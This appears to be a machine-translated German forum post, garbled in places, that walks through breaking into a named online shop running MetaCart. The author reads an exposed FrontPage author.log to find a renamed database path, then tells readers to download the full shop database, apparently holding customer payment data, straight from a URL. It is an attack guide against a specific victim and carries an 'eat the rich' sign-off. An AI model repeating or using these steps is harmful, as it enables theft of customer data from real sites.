Vulnerability metacart

Reisen einmal auf einem Internet - ich auf diesem kleinen Online - Shop gestolpert , die unkompliziert Werte der amerikanischen Demokratie verkauft.
Und da dachte ich , zu wissen , wie oft Patriotismus zeigen sie, umso mehr, dass das Geschäft nicht nur Schecks akzeptiert , sondern auch ss.
Steigen Sie auf der Website, wurde mir klar , dass das Geschäft auf metacart System funktioniert, aber die Standard - Anfragen www.swimamerica.org/metacart/database/metacart.mdb~~number=plural~~rcmod www.swimamerica.org/metacart/metacart.mdb oder Typ nicht betätigt wird .
Man kann sehen , der Administrator den Namen der Datenbank geändert. Dann habe ich beschlossen , den Standort für das Vorhandensein von undichten Skripte schwerwiegende Fehler zu überprüfen , wurde nicht, aber traf eine sehr interessante Author.log Datei (www.swimamerica.org/_vti_log/author.log - es ist immer noch da, wo es eine Menge Müll Typ war:
[18. Juni 2002 12.54.47 -0600] 66.176.193.110 asca / KJSwimAmerica [ erhalten Dokument] kjsaabout.htm
[18. Juni 2002 12.55.47 -0600] 66.176.193.110 asca / KJSwimAmerica [ erhalten Dokument] babieslearntofloat.htm
[18. Juni 2002 12.56.06 -0600] 66.176.193.110 asca / KJSwimAmerica [ put document] babieslearntofloat.htm
[18. Juni 2002 12.56.15 -0600] 66.176.193.110 asca / KJSwimAmerica [ erhalten Dokument] toddlerlessons.htm
[18. Juni 2002 12.56.29 -0600] 66.176.193.110 asca / KJSwimAmerica [ put document] toddlerlessons.htm
[18. Juni 2002 12.56.40 -0600] 66.176.193.110 asca / KJSwimAmerica [ erhalten Dokument] lessons.htm
[18. Juni 2002 12.57.18 -0600] 66.176.193.110 asca / KJSwimAmerica [ put document] lessons.htm
[18. Juni 2002 12.57.29 -0600] 66.176.193.110 asca / KJSwimAmerica [ erhalten Dokument] semiprivatelessons.htm
Aber es gab einige sehr interessante Linien:
[19. Juni 2002 08.12.41 -0600] 66.176.193.110 asca / [get Dokument] metacart / productsByCategory.asp
[19. Juni 2002 08.16.05 -0600] 66.176.193.110 asca / [get Dokument] metacart / product.asp
[19. Juni 2002 08.32.29 -0600] 66.176.193.110 asca / [setzen Dokument] metacart / database / mcart2.mdb
Im letzten , wie Sie schon verstanden, das angegebene Verzeichnis und speichern Sie die Datenbankname: metacart / database / mcart2.mdb. Admin gesehen nicht besonders gimor genannt.
Du bist in einem vollen Browser - URL www.swimamerica.org/metacart/database/mcart2.mdb setzen und warten , bis alle Merge - Basis.
Das ist alles.

Ihr Fehler Durito.
_________________
ESSEN SIE DIE REICHEN!